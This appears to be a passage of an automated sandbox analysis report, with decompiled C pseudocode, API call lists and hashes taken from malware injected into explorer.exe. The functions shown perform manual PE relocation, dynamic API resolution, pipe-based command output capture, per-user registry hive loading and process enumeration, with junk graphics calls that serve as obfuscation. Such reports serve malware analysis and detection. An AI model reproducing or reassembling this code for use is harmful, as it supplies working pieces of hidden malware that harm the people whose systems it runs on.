				while(0 != 0) {
				}
				while(_v28 > 0) {
					_v40 = _v24[2];
					_v28 = _v28 - _v40;
					_v40 = _v40 - 8;
					_v40 = _v40 >> 1;
					_v32 =  &(_v24[4]);
					_v36 = _a4 +  *_v24;
					_v44 = _v40;
					while(1) {
						_v44 = _v44 - 1;
						if(_v44 == 0) {
							break;
						}
						_v53 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v52 =  *_v32 & 0xfff;
						_v48 = (_v52 & 0x0000ffff) + _v36;
						if((_v53 & 0x000000ff) != 3) {
							if((_v53 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v12;
							}
						} else {
							 *_v48 =  *_v48 + _v12;
						}
						_v32 =  &(_v32[1]);
					}
					_v24 = _v32;
				}
				goto L13;
			}

0x00f6d495
0x00f6d49b
0x00f6d4a4
0x00f6d4a7
0x00f6d4aa
0x00000000
0x00f6d58e
0x00f6d592
0x00f6d59e
0x00f6d6b8
0x00f6d6c1
0x00f6d6c4
0x00f6d6c8
0x00f6d6ce
0x00f6d6d6
0x00f6d6d6
0x00f6d6de
0x00000000
0x00f6d6e9
0x00f6d5a4
0x00f6d5b7
0x00f6d5ba
0x00f6d5d7
0x00f6d5de
0x00f6d5f0
0x00f6d5f0
0x00f6d5f7
0x00f6d607
0x00f6d61f
0x00f6d609
0x00f6d611
0x00f6d611
0x00f6d622
0x00f6d626
0x00f6d636
0x00f6d659
0x00f6d66b
0x00f6d638
0x00f6d64c
0x00f6d64c
0x00f6d675
0x00f6d691
0x00f6d677
0x00f6d686
0x00f6d686
0x00f6d699
0x00f6d6a2
0x00f6d6a2
0x00f6d6b0
0x00000000
0x00f6d5f9
0x00f6d5fb
0x00000000
0x00f6d5fb
0x00f6d5f7
0x00000000
0x00f6d5ba
0x00f6d4bc
0x00f6d4c8
0x00f6d4cb
0x00f6d4cf
0x00f6d4d1
0x00f6d4e1
0x00f6d4ea
0x00f6d4f3
0x00f6d4fb
0x00f6d504
0x00f6d50f
0x00f6d515
0x00f6d518
0x00f6d51f
0x00f6d524
0x00000000
0x00000000
0x00f6d52f
0x00f6d53d
0x00f6d548
0x00f6d552
0x00f6d56a
0x00f6d577
0x00f6d577
0x00f6d554
0x00f6d55f
0x00f6d55f
0x00f6d57e
0x00f6d57e
0x00f6d586
0x00f6d586
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00F6D5D1
LoadLibraryA.KERNEL32(?), ref: 00F6D5EA
GetProcAddress.KERNEL32(00000000,?), ref: 00F6D646
GetProcAddress.KERNEL32(00000000,?), ref: 00F6D665

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 753be100af323c2d72e5acddc1a6d29754111ae564d58811df12b5ae0f5f221a
Instruction ID: 055479f2b618deb632fb4e8426d3804a0e0af80b4a9b836690184e0df38e7c5d
Opcode Fuzzy Hash: 753be100af323c2d72e5acddc1a6d29754111ae564d58811df12b5ae0f5f221a
Instruction Fuzzy Hash: 22A15775E04219DFCB14CF98C984AACBBF0FF09354F188469E81AAB351D735A981EF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F5BC8A, Relevance: 6.2, APIs: 4, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F5BC8A(intOrPtr _a4) {
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v36;
				int _v40;
				struct _SECURITY_ATTRIBUTES _v52;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				short _v96;
				intOrPtr _v100;
				void _v144;
				intOrPtr _t77;
				intOrPtr _t79;
				void* _t81;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t126;
				int _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;

				_t127 = 0x44;
				_v20 = 0;
				_v28 = 0;
				_v16 = 0;
				_v24 = 0;
				_v52.nLength = 0xc;
				_v52.lpSecurityDescriptor = 0;
				_v52.bInheritHandle = 1;
				_v36 = 0;
				_v12 = 0;
				memset( &_v144, 0, _t127);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t131 = _t130 + 0xc;
				asm("stosd");
				if(CreatePipe( &_v20,  &_v28,  &_v52, 0) != 0) {
					if(CreatePipe( &_v16,  &_v24,  &_v52, 0) == 0) {
						L14:
						E00F5AB81( &_v36, 0);
						if(_v28 != 0) {
							_t79 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t79 + 0x30))(_v28);
						}
						if(_v16 != 0) {
							_t77 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t77 + 0x30))(_v16);
						}
						return _v12;
					}
					_t81 = _v24;
					_v80 = _t81;
					_v84 = _t81;
					_v88 = _v20;
					_v144 = _t127;
					_v100 = 0x101;
					_v96 = 0;
					_t126 = E00F5AC58(0x1001);
					_v36 = _t126;
					if(_t126 == 0) {
						goto L1;
					}
					_push( &_v68);
					_push( &_v144);
					_t88 =  *0xf89740; // 0x547f6c8
					_push(0);
					_push(0);
					_push(0x8000000);
					_push(1);
					_push(0);
					_push(0);
					_push(_a4);
					_push(0);
					if( *((intOrPtr*)(_t88 + 0x38))() == 0) {
						goto L14;
					}
					_t90 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t90 + 0x30))(_v20);
					_t92 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t92 + 0x30))(_v24);
					_v32 = 0;
					do {
						_t95 =  *0xf89740; // 0x547f6c8
						_t128 =  *((intOrPtr*)(_t95 + 0x88))(_v16, _t126, 0x1000,  &_v32, 0);
						 *((char*)(_v32 + _t126)) = 0;
						_t98 = _v12;
						if(_t98 == 0) {
							_v12 = E00F5B670(0, _t126);
						} else {
							_push(0);
							_push(_t126);
							_v40 = _t98;
							_v12 = E00F5B367(_t98);
							E00F5AB81( &_v40, 0xffffffff);
							_t131 = _t131 + 0x14;
						}
					} while (_t128 != 0);
					if(IsTextUnicode(_v12, E00F5ACD6(_v12),  &_v40) != 0) {
						L13:
						_t104 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t104 + 0x30))(_v68);
						_t106 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t106 + 0x30))(_v64);
						goto L14;
					}
					_t129 = E00F5B550(_v12);
					if(_t129 == 0) {
						goto L13;
					}
					E00F5AB81( &_v12, 0);
					return _t129;
				}
				L1:
				return 0;
			}

0x00f5bc9a
0x00f5bca4
0x00f5bca7
0x00f5bcaa
0x00f5bcad
0x00f5bcb0
0x00f5bcb7
0x00f5bcba
0x00f5bcc1
0x00f5bcc4
0x00f5bcc7
0x00f5bcd1
0x00f5bcd2
0x00f5bcd3
0x00f5bcd4
0x00f5bcd7
0x00f5bcef
0x00f5bd09
0x00f5be2e
0x00f5be33
0x00f5be3d
0x00f5be42
0x00f5be47
0x00f5be47
0x00f5be4d
0x00f5be52
0x00f5be57
0x00f5be57
0x00000000
0x00f5be5a
0x00f5bd0f
0x00f5bd12
0x00f5bd15
0x00f5bd1b
0x00f5bd25
0x00f5bd2b
0x00f5bd32
0x00f5bd3b
0x00f5bd3e
0x00f5bd43
0x00000000
0x00000000
0x00f5bd48
0x00f5bd4f
0x00f5bd50
0x00f5bd55
0x00f5bd56
0x00f5bd57
0x00f5bd5c
0x00f5bd5e
0x00f5bd5f
0x00f5bd60
0x00f5bd63
0x00f5bd69
0x00000000
0x00000000
0x00f5bd72
0x00f5bd77
0x00f5bd7d
0x00f5bd82
0x00f5bd85
0x00f5bd88
0x00f5bd8d
0x00f5bda1
0x00f5bda6
0x00f5bda9
0x00f5bdae
0x00f5bdd7
0x00f5bdb0
0x00f5bdb0
0x00f5bdb1
0x00f5bdb3
0x00f5bdbb
0x00f5bdc4
0x00f5bdc9
0x00f5bdc9
0x00f5bdda
0x00f5bdf7
0x00f5be18
0x00f5be1b
0x00f5be20
0x00f5be26
0x00f5be2b
0x00000000
0x00f5be2b
0x00f5be01
0x00f5be06
0x00000000
0x00000000
0x00f5be0d
0x00000000
0x00f5be14
0x00f5bcf1
0x00000000

APIs

memset.MSVCRT ref: 00F5BCC7
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,77432D10,00000000), ref: 00F5BCEB
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F5BD05
IsTextUnicode.ADVAPI32(00F59F46,00000000,?), ref: 00F5BDEF

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreatePipe$TextUnicodememset
String ID:
API String ID: 3251035996-0
Opcode ID: 8767567e5778965b421a7690af3802282104c8841f6c1fed67eff081044ca03e
Instruction ID: 594e13a691459fec50c79305d219ec92ca9d302d70b865e39c961155a2e18303
Opcode Fuzzy Hash: 8767567e5778965b421a7690af3802282104c8841f6c1fed67eff081044ca03e
Instruction Fuzzy Hash: EA5125B2D1021DAFDB00DFA9DC85DEEBBB8FB08311F14416AFA01E3251E7349945AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F5889F, Relevance: 6.1, APIs: 4, Instructions: 127
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F5889F(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				struct HDC__* _v8;
				short* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v544;
				intOrPtr _t33;
				char _t34;
				short* _t36;
				intOrPtr _t42;
				intOrPtr _t47;
				void* _t50;
				char _t51;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				char* _t70;
				void* _t75;
				void* _t76;
				void* _t77;

				_t66 = __ecx;
				_t33 =  *0xf89720; // 0xf90000
				_v8 = 0;
				_t34 = E00F51091(_a8, 0,  *((intOrPtr*)(_t33 + 0xa0)));
				_t76 = _t75 + 0xc;
				_v16 = _t34;
				if(_t34 != 0) {
					__imp__ConvertSidToStringSidW(_a4,  &_v8, _t69);
					_t36 = E00F58AF1(__ecx, 0x3dd);
					_push(0);
					_push(_t36);
					_t70 = "\\";
					_push(_t70);
					_v12 = _t36;
					_v20 = E00F5B60A(_v8);
					E00F5BA86( &_v12);
					E00F55616(_t66, _a4,  &_v544, 0x104);
					_t42 =  *0xf89720; // 0xf90000
					_t77 = _t76 + 0x24;
					if(( *(_t42 + 0x1898) & 0x00000001) == 0) {
						_t50 = E00F51000(0x80000003, _v20, _v16);
						_t77 = _t77 + 0xc;
						if(_t50 == 0xffffffff) {
							_t51 = E00F62CCE(_t66, 0x8fc);
							_push(0);
							_push(_t51);
							_v24 = _t51;
							_push(_t70);
							_v12 = E00F5B60A( &_v544);
							E00F5BA86( &_v24);
							_t77 = _t77 + 0x18;
							BitBlt(0, 0x2c, 0x31, 0x2e, 1, 0, 0x2c, 0x2f, 0x17);
							Arc(0, 0x59, 7, 0x52, 0x4c, 0x47, 0x2b, 0x4f, 0x20);
							if(RegLoadKeyW(0x80000003, _v8, _v12) == 0) {
								E00F51000(0x80000003, _v20, _v16);
								_t62 =  *0xf8974c; // 0x547f890
								_t77 = _t77 + 0xc;
								 *((intOrPtr*)(_t62 + 0x30))(0x80000003, _v8);
							}
							E00F5AB81( &_v12, 0xfffffffe);
						}
					}
					E00F5AB81( &_v20, 0xffffffff);
					E00F5AB81( &_v16, 0xffffffff);
					_t47 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t47 + 0x34))(_v8);
					return 0;
				}
				_t64 = 0xfffffffe;
				return _t64;
			}

0x00f5889f
0x00f588a8
0x00f588b0
0x00f588bd
0x00f588c2
0x00f588c5
0x00f588ca
0x00f588dc
0x00f588e7
0x00f588ec
0x00f588ed
0x00f588ee
0x00f588f3
0x00f588f7
0x00f588ff
0x00f58906
0x00f5891a
0x00f5891f
0x00f58924
0x00f5892e
0x00f58941
0x00f58946
0x00f5894c
0x00f58957
0x00f5895c
0x00f5895d
0x00f5895e
0x00f58967
0x00f5896e
0x00f58975
0x00f5897a
0x00f5898d
0x00f589a4
0x00f589b9
0x00f589c2
0x00f589c7
0x00f589cc
0x00f589d3
0x00f589d3
0x00f589dc
0x00f589e2
0x00f589e3
0x00f589ea
0x00f589f5
0x00f589fa
0x00f58a05
0x00000000
0x00f58a0a
0x00f588ce
0x00000000

APIs

Part of subcall function 00F51091: IsValidCodePage.KERNEL32(00000007,?,?,00F6CE11,00000000), ref: 00F5109D

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00F588DC
BitBlt.GDI32(00000000,0000002C,00000031,0000002E,00000001,00000000,0000002C,0000002F,00000017), ref: 00F5898D
Arc.GDI32(00000000,00000059,00000007,00000052,0000004C,00000047,0000002B,0000004F,00000020), ref: 00F589A4
RegLoadKeyW.ADVAPI32(80000003,?,?), ref: 00F589B1

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodeConvertLoadPageStringValid
String ID:
API String ID: 2515928058-0
Opcode ID: 9f165e099901d91daf95beaffb08e62c3845b4c341716c00b7cc83b3f6c3f50c
Instruction ID: 3e49de037dcbc3f4809c0de47a22840e8ef108c2567137762ef697a44431acbc
Opcode Fuzzy Hash: 9f165e099901d91daf95beaffb08e62c3845b4c341716c00b7cc83b3f6c3f50c
Instruction Fuzzy Hash: 08419E71D4020CBBEF11ABA4DC86FEE7B78EB04751F100161FB15B60D2DA784A58AB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F598F4, Relevance: 6.1, APIs: 4, Instructions: 111
threadCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F598F4(struct HDC__* __edx, void* __fp0, intOrPtr _a4) {
				char _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t16;
				void* _t17;
				char _t19;
				intOrPtr _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t29;
				intOrPtr _t31;
				signed int _t35;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				struct HDC__* _t59;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr* _t69;
				void* _t73;
				void* _t76;

				_t76 = __fp0;
				_t59 = __edx;
				_t69 = (_t67 & 0xfffffff8) - 0x1c;
				_push(_t63);
				while(1) {
					_t16 =  *0xf89740; // 0x547f6c8
					_t17 =  *((intOrPtr*)(_t16 + 0x2c))( *0xf8979c, 0);
					if(_t17 == 0 || _t17 == 0x80) {
						break;
					}
					E00F5CEF9(_t59,  &_v36);
					_t39 =  *0xf897ac; // 0x0
					_t57 =  *0xf897a8; // 0x0
					_t58 = _t57 + 0xe10;
					asm("adc eax, ebx");
					_t73 = _t39 - _v32;
					if(_t73 > 0 || _t73 >= 0 && _t58 >= _v36) {
						_t35 = 0xfffffffe;
						L14:
						return _t35;
					} else {
						_t40 =  *0xf89740; // 0x547f6c8
						_push(0);
						_push( *0xf897bc);
						if( *((intOrPtr*)(_t40 + 0xc8))() == 0) {
							break;
						}
						_t42 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t42 + 0xb4))(0x3e8);
						continue;
					}
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 =  *0xf897cc; // 0x547fb10
				_v28 = _t19;
				_t21 = E00F5D103(_a4,  &_v16);
				_v20 = _t21;
				if(_t21 != 0) {
					_t22 = GetCurrentProcess();
					_t23 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t23, _t22, 0xf897bc, 0, 0, 2);
					E00F5CEF9(_t59, 0xf897a8);
					 *_t69 = E00F59639;
					_push( &_v28);
					_t65 = E00F592B1(_t59, _t76);
					if(_t65 >= 0) {
						_push(0);
						_push( *0xf89800);
						_t53 = 0x27;
						E00F5C403(_t53);
					}
				} else {
					_t65 = _t63 | 0xffffffff;
				}
				_t29 =  *0xf89740; // 0x547f6c8
				 *((intOrPtr*)(_t29 + 0x30))( *0xf897bc);
				_t31 =  *0xf89740; // 0x547f6c8
				 *0xf897bc = 0;
				 *((intOrPtr*)(_t31 + 0x90))( *0xf8979c);
				E00F5AB81( &_v28, 0);
				_t35 = _t65;
				goto L14;
			}

0x00f598f4
0x00f598f4
0x00f598fa
0x00f598fe
0x00f59902
0x00f59902
0x00f5990e
0x00f59913
0x00000000
0x00000000
0x00f59921
0x00f59926
0x00f5992c
0x00f59932
0x00f59938
0x00f5993a
0x00f5993e
0x00f59972
0x00f59a31
0x00f59a37
0x00f59948
0x00f59948
0x00f5994d
0x00f5994e
0x00f5995c
0x00000000
0x00000000
0x00f5995e
0x00f59968
0x00000000
0x00f59968
0x00f5993e
0x00f5997e
0x00f5997f
0x00f59980
0x00f59981
0x00f59982
0x00f59987
0x00f59993
0x00f5999a
0x00f599a0
0x00f599b6
0x00f599b9
0x00f599c3
0x00f599ce
0x00f599d7
0x00f599de
0x00f599e4
0x00f599ea
0x00f599ec
0x00f599ed
0x00f599f5
0x00f599f6
0x00f599fc
0x00f599a2
0x00f599a2
0x00f599a2
0x00f59a03
0x00f59a08
0x00f59a11
0x00f59a16
0x00f59a1c
0x00f59a28
0x00f59a2f
0x00000000

APIs

GetCurrentProcess.KERNEL32(00F897BC,00000000,00000000,00000002,?,?,?,?,?,?,?,00F5A6E2,?), ref: 00F599B6
GetCurrentThread.KERNEL32 ref: 00F599B9
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00F5A6E2,?), ref: 00F599C0
DuplicateHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00F5A6E2,?), ref: 00F599C3

Part of subcall function 00F5CEF9: GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
Part of subcall function 00F5CEF9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Current$ProcessTime$DuplicateFileHandleSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3712177519-0
Opcode ID: 97790ef6593d45a49859c3bb49de06d6a486e36fbdfdeff55a1a4d13c582056a
Instruction ID: 9412944344d951486a9621742c6ee1d4bdb98d6db6883a6c434c74a08e341028
Opcode Fuzzy Hash: 97790ef6593d45a49859c3bb49de06d6a486e36fbdfdeff55a1a4d13c582056a
Instruction Fuzzy Hash: AD31833251C208EFDB04AF68EC85DBD77A8F704361B18092EFA45C31A1DAB49848EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A246, Relevance: 6.1, APIs: 4, Instructions: 90
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00F5A246(intOrPtr _a4, signed int* _a8) {
				int _v8;
				void _v526;
				short _v528;
				char _v812;
				intOrPtr _t31;
				intOrPtr _t45;
				short _t46;
				intOrPtr _t47;
				void* _t49;
				signed int* _t62;

				_v528 = 0;
				memset( &_v526, 0, 0x206);
				_t31 =  *0xf89740; // 0x547f6c8
				_v8 = 0;
				_t49 =  *((intOrPtr*)(_t31 + 0x24))(0x1410, 0,  *((intOrPtr*)(_a4 + 8)));
				if(_t49 != 0) {
					_t45 =  *0xf89740; // 0x547f6c8
					if( *((intOrPtr*)(_t45 + 0xcc)) == 0) {
						_t46 =  &_v528;
						__imp__GetModuleFileNameExW(_t49, 0, _t46, 0x103);
					} else {
						_v8 = 0x103;
						_t46 =  *((intOrPtr*)(_t45 + 0xcc))(_t49, 0,  &_v528,  &_v8);
					}
					if(_t46 == 0) {
						_v528 = _t46;
					}
					_t47 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t47 + 0x30))(_t49);
				}
				__imp__GetCPInfoExA(0x11, 0x1f,  &_v812);
				if(_v528 == 0) {
					lstrcpynW( &_v528, _a4 + 0x24, 0x103);
				}
				_t62 = _a8;
				 *((intOrPtr*)( *_t62 * 0xc + _t62[1])) = E00F5B6B3(_a4 + 0x24);
				 *((intOrPtr*)( *_t62 * 0xc + _t62[1] + 4)) = E00F5B6B3( &_v528);
				 *_t62 =  *_t62 + 1;
				return 1;
			}

0x00f5a259
0x00f5a26a
0x00f5a278
0x00f5a283
0x00f5a289
0x00f5a292
0x00f5a294
0x00f5a29f
0x00f5a2ba
0x00f5a2c3
0x00f5a2a1
0x00f5a2ae
0x00f5a2b1
0x00f5a2b1
0x00f5a2cb
0x00f5a2cd
0x00f5a2cd
0x00f5a2d4
0x00f5a2da
0x00f5a2da
0x00f5a2e8
0x00f5a2f5
0x00f5a306
0x00f5a306
0x00f5a30f
0x00f5a323
0x00f5a33c
0x00f5a340
0x00f5a349

APIs

memset.MSVCRT ref: 00F5A26A
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000103), ref: 00F5A2C3
GetCPInfoExA.KERNEL32(00000011,0000001F,?), ref: 00F5A2E8
lstrcpynW.KERNEL32(?,?,00000103), ref: 00F5A306

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: FileInfoModuleNamelstrcpynmemset
String ID:
API String ID: 2998138809-0
Opcode ID: 5bb94a3de764be9449f9cb3cea5afac6e2b44007892b1e3fc2e82d58aa43d4af
Instruction ID: c6442989cfd424b5de8e737549490e38177880a0693cf26e5c731664eb85a21c
Opcode Fuzzy Hash: 5bb94a3de764be9449f9cb3cea5afac6e2b44007892b1e3fc2e82d58aa43d4af
Instruction Fuzzy Hash: 91319F76900218AFDB24DF94CC89EEA77BCFF48310F1081A9FA1ADB252D6709A45DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F6FD15, Relevance: 6.0, APIs: 4, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F6FD15(signed int _a4) {
				signed int _t9;
				signed int _t10;
				signed int _t15;

				_t9 =  *0xf8970c; // 0x0
				_t15 = _a4;
				if(_t9 == 0) {
					_t10 = InterlockedIncrement(0xf89710);
					if(_t10 != 1) {
						goto L9;
					} else {
						if(_t15 == 0) {
							_t10 = E00F6FC6D( &_a4);
							if(_t10 != 0) {
								_push(_t15);
								L00F70774();
								_a4 = _t10;
								_t10 = GetCurrentProcessId();
								_a4 = _a4 ^ _t10;
							}
							if(_a4 == 0) {
								_a4 = 1;
							}
							_t15 = _a4;
						}
						 *0xf8970c = _t15;
						return _t10;
					}
					do {
						goto L9;
					} while (_t9 == 0);
					goto L10;
					L9:
					SwitchToThread();
					_t9 =  *0xf8970c; // 0x0
				}
				L10:
				return _t9;
			}

0x00f6fd18
0x00f6fd1e
0x00f6fd23
0x00f6fd2a
0x00f6fd33
0x00000000
0x00f6fd35
0x00f6fd37
0x00f6fd3d
0x00f6fd45
0x00f6fd47
0x00f6fd48
0x00f6fd4e
0x00f6fd51
0x00f6fd57
0x00f6fd57
0x00f6fd5e
0x00f6fd60
0x00f6fd60
0x00f6fd67
0x00f6fd67
0x00f6fd6a
0x00000000
0x00f6fd6a
0x00f6fd72
0x00000000
0x00000000
0x00000000
0x00f6fd72
0x00f6fd72
0x00f6fd78
0x00f6fd7d
0x00f6fd83
0x00f6fd83

APIs

InterlockedIncrement.KERNEL32(00F89710), ref: 00F6FD2A
SwitchToThread.KERNEL32(?,00F6E55C,00000000,00000000,00F6483A,00000044,00000000,?,00F64BF0,00000000,?,00F8EFF4,00000044,?,00000000,?), ref: 00F6FD72

Part of subcall function 00F6FC6D: GetModuleHandleA.KERNEL32(advapi32.dll,00000044,?,00F8F9B8,?), ref: 00F6FC7D

_time64.MSVCRT ref: 00F6FD48
GetCurrentProcessId.KERNEL32(?,00F6E55C,00000000,00000000,00F6483A,00000044,00000000,?,00F64BF0,00000000,?,00F8EFF4,00000044,?,00000000,?), ref: 00F6FD51

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentHandleIncrementInterlockedModuleProcessSwitchThread_time64
String ID:
API String ID: 2459202522-0
Opcode ID: 03ee432175287e3465eda4faf5bf4981e21b4306d2a8a6d123d9791ec75ad731
Instruction ID: 42537abb29cb71546ad40c9391890efe13c0616b54cf43153d69f8448f99773e
Opcode Fuzzy Hash: 03ee432175287e3465eda4faf5bf4981e21b4306d2a8a6d123d9791ec75ad731
Instruction Fuzzy Hash: 41F0EC31D142189BCF109F64E8456E93BA8BB087A5F188025FD09DB250D7B4E988BB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F56628, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00F56628(intOrPtr _a4, intOrPtr _a8, signed int _a16) {
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v96;
				intOrPtr _v100;
				void* __ebx;
				void* __esi;
				intOrPtr _t123;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t151;
				signed int _t154;
				signed int _t156;
				signed int _t160;
				intOrPtr _t161;
				signed int _t162;
				signed int _t164;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t177;
				intOrPtr _t179;
				signed int _t183;
				void* _t190;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				void* _t213;

				_v32 = _v32 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				while(0 != 0) {
				}
				_v24 = E00F5D2EE(_a8,  &_v40);
				BitBlt(0, 0x42, 0, 0x11, 0, 0, 0x1c, 0x5d, 0x40);
				__eflags = _v24;
				if(_v24 != 0) {
					_v48 = _v48 & 0x00000000;
					_v52 = _v52 & 0x00000000;
					_v44 = _v44 & 0x00000000;
					_v56 = _v56 & 0x00000000;
					_v48 = E00F5F00D( &_v52);
					__eflags = _v48;
					if(_v48 != 0) {
						_v44 = _v44 & 0x00000000;
						while(1) {
							__eflags = _v44 - _v52;
							if(_v44 >= _v52) {
								break;
							}
							_t154 = E00F5BB47( *((intOrPtr*)(_v48 + _v44 * 4)),  &_v20);
							__eflags = _t154;
							if(_t154 != 0) {
								goto L12;
							} else {
								 *0xf89788 = _v40;
								 *0xf8977c = _a4;
								 *0xf89780 = _a16;
								_t160 = E00F5BB93(_v20, _v24, _v40);
								_t213 = _t213 + 0xc;
								 *0xf89784 = _t160;
								__eflags =  *0xf89784;
								if(__eflags != 0) {
									_t161 =  *0xf89720; // 0xf90000
									_t162 = E00F5EE74( &_v20, __eflags, E00F570F4,  *((intOrPtr*)(_t161 + 0x224)));
									__eflags = _t162;
									if(_t162 != 0) {
										_t164 = E00F5EF7B( &_v20);
										__eflags = _t164;
										if(_t164 != 0) {
											_v28 = E00F56BED(_v20);
											_v56 = 1;
										} else {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_t167 =  *0xf89740; // 0x547f6c8
											 *((intOrPtr*)(_t167 + 0x30))(_v16);
											_t169 =  *0xf89740; // 0x547f6c8
											 *((intOrPtr*)(_t169 + 0x30))(_v20);
											_v36 = 0xfffffffc;
											goto L12;
										}
									} else {
										_t171 =  *0xf89740; // 0x547f6c8
										 *((intOrPtr*)(_t171 + 0x30))(_v16);
										_t173 =  *0xf89740; // 0x547f6c8
										 *((intOrPtr*)(_t173 + 0x30))(_v20);
										_v60 = 0x1e;
